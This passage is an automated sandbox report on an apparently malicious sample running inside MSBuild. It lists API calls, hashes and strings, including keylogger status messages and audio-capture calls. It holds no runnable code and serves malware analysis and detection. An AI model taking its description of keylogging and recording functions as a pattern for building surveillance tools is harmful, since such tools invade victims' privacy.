  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
• Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
• Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
• Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
APIs
  • Part of subcall function 0044DA5C: GetOEMCP.KERNEL32(00000000,?,?,0044DCE5,?), ref: 0044DA87
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044DD2A,?,00000000), ref: 0044DEFD
• GetCPInfo.KERNEL32(00000000,0044DD2A,?,?,?,0044DD2A,?,00000000), ref: 0044DF10
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CodeInfoPageValid
• String ID: u;~/
• API String ID: 546120528-1979702588
• Opcode ID: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
• Instruction ID: df262af5b8aedb6acfa17e1c9bcd504f5ccc85cb1eacd95bde0bd7f7b44a6e87
• Opcode Fuzzy Hash: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
• Instruction Fuzzy Hash: C2513370D042059EFB348F72C8856BBBBA5AF41304F14446FD0978B252D67DA94ACB99
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: __alloca_probe_16__freea
• String ID: u;~/
• API String ID: 1635606685-1979702588
• Opcode ID: b32cfc21b014397943d4768a8ec031577c5cd3872f76e05ce294e310fa9bfd45
• Instruction ID: eda24c5a96448ea724016aad991a3c17b1a8d64d08c979da106213b1ff49c618
• Opcode Fuzzy Hash: b32cfc21b014397943d4768a8ec031577c5cd3872f76e05ce294e310fa9bfd45
• Instruction Fuzzy Hash: C3410772600116ABFB24AF75CC41B6F77A4DF85764B24412BF808DB251EB7CD840D799
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004417D0
• ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00441850
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID: u;~/
• API String ID: 1834446548-1979702588
• Opcode ID: 4e3f0789a83cd42ccf5d86220a06b2026318fdb8ffa18d035122962d44076112
• Instruction ID: 2146db567d2bb220d29859169affe98659c958252d9561a70165c400765bfcbb
• Opcode Fuzzy Hash: 4e3f0789a83cd42ccf5d86220a06b2026318fdb8ffa18d035122962d44076112
• Instruction Fuzzy Hash: 7141E271B002599BFB20DF64CC80BE977B5EB48305F1081EAE54997261D779DEC1CB98
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: __cftof
• String ID: u;~/$BG3i@
• API String ID: 1622813385-1333258365
• Opcode ID: 0e53b18c89b8a5a252250ce90d767f597698ce4f8bbb56296b0f5e4f7aee30ca
• Instruction ID: bce913b95f802116dab1e577d75f3ddb0db760047eed59d17a61653a1e464538
• Opcode Fuzzy Hash: 0e53b18c89b8a5a252250ce90d767f597698ce4f8bbb56296b0f5e4f7aee30ca
• Instruction Fuzzy Hash: 3D31B632424115EAB7246E399C8687FB768DE41734B24072FF824DA5D1EA2CDC43A35D
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
• SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/jpeg
• API String ID: 1291196975-3785015651
• Opcode ID: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
• Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
• Opcode Fuzzy Hash: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
• Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
• Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
• Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
• Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A875,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A4E2
• GetLastError.KERNEL32(?,0044A875,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?,00000000,?,?,00000000,?), ref: 0044A50B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorFileLastWrite
• String ID: u;~/
• API String ID: 442123175-1979702588
• Opcode ID: c39b9dd4969b82759b4a64fd6f6db30710fc12bbb1168e7814732e2b2553290a
• Instruction ID: d2b0fdf121e4141f9d7aedeff3631e04d8df33b54a9a48bc31cf78ca303085e0
                                                                                                                                            • Opcode Fuzzy Hash: c39b9dd4969b82759b4a64fd6f6db30710fc12bbb1168e7814732e2b2553290a
                                                                                                                                            • Instruction Fuzzy Hash: 28318D31A002199BCB24CF69DD809DAF3F9EF88315F1084BAE909D7260D634ED91CB59
                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A895,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A3F4
                                                                                                                                            • GetLastError.KERNEL32(?,0044A895,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?,00000000,?,?,00000000,?), ref: 0044A41D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 442123175-1979702588
                                                                                                                                            • Opcode ID: b0ef3c2e6dfb1b8d3472dbcbd7cc921f28cd0bda6ef427c1a1c72b96cec88488
                                                                                                                                            • Instruction ID: e9c05e2c57ce44ee84f0e33fe03ef9ce333ea83921497ff6c8cd7e19a143d9c9
                                                                                                                                            • Opcode Fuzzy Hash: b0ef3c2e6dfb1b8d3472dbcbd7cc921f28cd0bda6ef427c1a1c72b96cec88488
                                                                                                                                            • Instruction Fuzzy Hash: 6021E131A002189FCB14CF59D984AE9B3F9EB48306F1004AEE90AD7211D774AE85CF29
                                                                                                                                            APIs
                                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                                                                              • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                                                                              • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                              • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                            • String ID: image/png
                                                                                                                                            • API String ID: 1291196975-2966254431
                                                                                                                                            • Opcode ID: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                            • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                                                                            • Opcode Fuzzy Hash: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                            • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                            Strings
                                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                            • API String ID: 481472006-1507639952
                                                                                                                                            • Opcode ID: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                                            • Opcode Fuzzy Hash: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                                            APIs
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,0000000A), ref: 004471D4
                                                                                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 2279764990-1979702588
                                                                                                                                            • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                                                            • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                                                                                                            • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                                                            • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strlen
                                                                                                                                            • String ID: : $Se.
                                                                                                                                            • API String ID: 4218353326-4089948878
                                                                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                            • API String ID: 481472006-2430845779
                                                                                                                                            • Opcode ID: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                                            • Opcode Fuzzy Hash: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043419B
                                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 00434282
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 3761405300-1979702588
                                                                                                                                            • Opcode ID: 55f35760b53b456a169b3277dece2ce7442f289f493762303a99d350d49c20e8
                                                                                                                                            • Instruction ID: 152c00956f4b34dade641c512d66f5ecdeb636344f370a0960c3468f4f65043c
                                                                                                                                            • Opcode Fuzzy Hash: 55f35760b53b456a169b3277dece2ce7442f289f493762303a99d350d49c20e8
                                                                                                                                            • Instruction Fuzzy Hash: 2C21BCB5512300DAE760CF69F946B543BA8BB58314F10683AE90CCA3A1E3F4A9C1CB4D
                                                                                                                                            APIs
                                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: alarm.wav$xIG
• API String ID: 1174141254-4080756945
• Opcode ID: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
• Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
• Opcode Fuzzy Hash: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
• Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
• Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
• Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
• Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
• Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
• Opcode Fuzzy Hash: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
• Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,1AE85006,00000001,?,0043B995), ref: 004478CE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: String
• String ID: LCMapStringEx$u;~/
• API String ID: 2568140703-4289478611
• Opcode ID: 36dbacc1f291d1caf6fc4fdd55d35bbab46bd94e6c0c63a945ca64c770c26f8d
• Instruction ID: 749e071dddadb0611b3357a2cf1c840dd35b3db394ad94bf3c266594d1e105ea
• Opcode Fuzzy Hash: 36dbacc1f291d1caf6fc4fdd55d35bbab46bd94e6c0c63a945ca64c770c26f8d
• Instruction Fuzzy Hash: D4012932504209FBDF12AF90DC06EEE7F62EF09755F008165FE0865161C7369971EB99
APIs
• GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466D0,?,00000000,00401AD8), ref: 00447580
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: DateFormat
• String ID: GetDateFormatEx$u;~/
• API String ID: 2793631785-3263374078
• Opcode ID: 5d62f8a1a75e1aabdfa4b9dd35d9b0414c375981d7af8c61118b1623e35876fd
• Instruction ID: 107bc5199d8ee9bd941501caefe4e3e09b7036c662d67d2c93170c31f93f932a
• Opcode Fuzzy Hash: 5d62f8a1a75e1aabdfa4b9dd35d9b0414c375981d7af8c61118b1623e35876fd
• Instruction Fuzzy Hash: 4C015E3254420DFBDF129F90DC06E9E3F62EF08751F004455FD0456161C73A8931EB99
APIs
• waveInPrepareHeader.WINMM(00F05218,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(00F05218,00000020,?,00000000,00401913), ref: 0040175D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: T=G
• API String ID: 2315374483-379896819
• Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
• Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
• Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
• Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
APIs
• GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466D0,?,00000000,00401AD8), ref: 004476B0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: FormatTime
• String ID: GetTimeFormatEx$u;~/
• API String ID: 3606616251-4249145515
• Opcode ID: 3956611c8a71c3b46736b6e6ca5e7506186d9fff0ec06378fabeac1b614756b3
• Instruction ID: 3fcb3ff1dd883ddaf863bb7c07e380bbf4f181685cad0432e832d9f8a01a98f1
• Opcode Fuzzy Hash: 3956611c8a71c3b46736b6e6ca5e7506186d9fff0ec06378fabeac1b614756b3
• Instruction Fuzzy Hash: 07F0C831A0420CFBEF11AF65DC06EAE7F25EF04715F00006AFC0466262CB358921ABDD
APIs
• GetUserDefaultLCID.KERNEL32(00000055,?,00000000,004503AF,?,00000055,00000050), ref: 00447711
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
